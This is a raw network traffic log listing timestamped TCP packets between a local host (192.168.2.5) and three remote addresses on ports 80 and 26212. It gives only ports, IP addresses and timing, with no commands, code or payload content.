Aug 31, 2024 15:44:19.059600115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059603930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059612036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059628963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059639931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.059649944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059669018 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.059681892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060461044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060471058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060487032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060514927 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060534954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060534954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060548067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060568094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060579062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060585022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060590029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060616970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060622931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060626984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060636997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060672998 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060687065 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060709953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060722113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060733080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060753107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060765982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060798883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060811043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060821056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.060843945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.060866117 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061305046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061352015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061356068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061367989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061398029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061398029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061409950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061420918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061430931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061439991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061445951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061466932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061472893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061485052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061486006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061496019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061527967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061530113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061538935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061549902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061553001 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061563015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.061577082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061583996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.061603069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.062407970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062419891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062429905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062454939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.062473059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.062532902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062544107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062553883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062565088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062577963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062582970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.062596083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062603951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.062608957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062617064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.062621117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062633991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062637091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.062645912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062654972 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.062658072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.062680960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.062700033 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063251019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063268900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063280106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063313961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063318014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063328028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063333035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063344002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063354015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063355923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063368082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063386917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063400984 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063420057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063438892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063476086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063487053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063532114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063532114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063606977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063621998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063632965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063642025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063652039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.063673973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.063688040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.064372063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.064383030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.064393044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.064424038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.064436913 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.064503908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.064512968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.064522982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.064532995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.064542055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.064554930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.064564943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.064584970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.080439091 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.080451012 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.080461025 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.080475092 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.080514908 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.080514908 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.081317902 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.081327915 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.081338882 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.081367970 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.081379890 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.081511021 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.081518888 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.081619978 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.091027975 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:19.134296894 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.134310007 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.134320974 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.134330988 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.134394884 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.134435892 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.149077892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149089098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149108887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149158955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149169922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149173021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149180889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149214029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149226904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149301052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149310112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149358034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149457932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149468899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149482965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149501085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149506092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149512053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149530888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149544001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149549961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149555922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149590969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149672031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149682045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149692059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149714947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149728060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149728060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149758101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149760008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149866104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149877071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149885893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.149914980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.149930000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.150121927 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:19.150199890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150209904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150218964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150249004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.150258064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.150363922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150376081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150384903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150415897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.150434017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.150528908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150538921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150548935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150558949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150572062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150579929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.150580883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150593042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150600910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.150603056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150613070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.150623083 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.150641918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.150651932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151083946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151103973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151113033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151123047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151133060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151144981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151154995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151164055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151196957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151226044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151237011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151246071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151271105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151285887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151304007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151314020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151324987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151350975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151360035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151433945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151443958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151454926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151465893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151474953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.151479959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151499987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.151506901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.152470112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152496099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152504921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152517080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.152543068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152545929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.152554989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152566910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152575970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152600050 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.152609110 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.152771950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152791023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152801037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152812004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152818918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.152831078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.152848959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.152936935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152985096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.152985096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.152997017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153032064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153036118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153080940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153470993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153486967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153496981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153570890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153598070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153608084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153616905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153625965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153635979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153669119 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153681993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153733015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153743982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153753996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153763056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153773069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153778076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153784990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153794050 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153796911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153809071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153827906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153836966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153860092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153908968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153923035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153934002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153963089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153973103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.153975010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153975010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.153984070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154007912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154021025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154136896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154148102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154156923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154165983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154176950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154185057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154187918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154196024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154202938 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154207945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154225111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154248953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154691935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154709101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154719114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154748917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154752970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154762983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154763937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154774904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154784918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154789925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154794931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154804945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154810905 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154815912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154827118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154829979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154836893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154846907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154846907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154846907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154859066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.154874086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.154892921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.155045986 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155055046 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.155334949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.155344963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.155354023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.155364037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.155383110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.155390024 CEST	49727	80	192.168.2.5	52.212.52.84
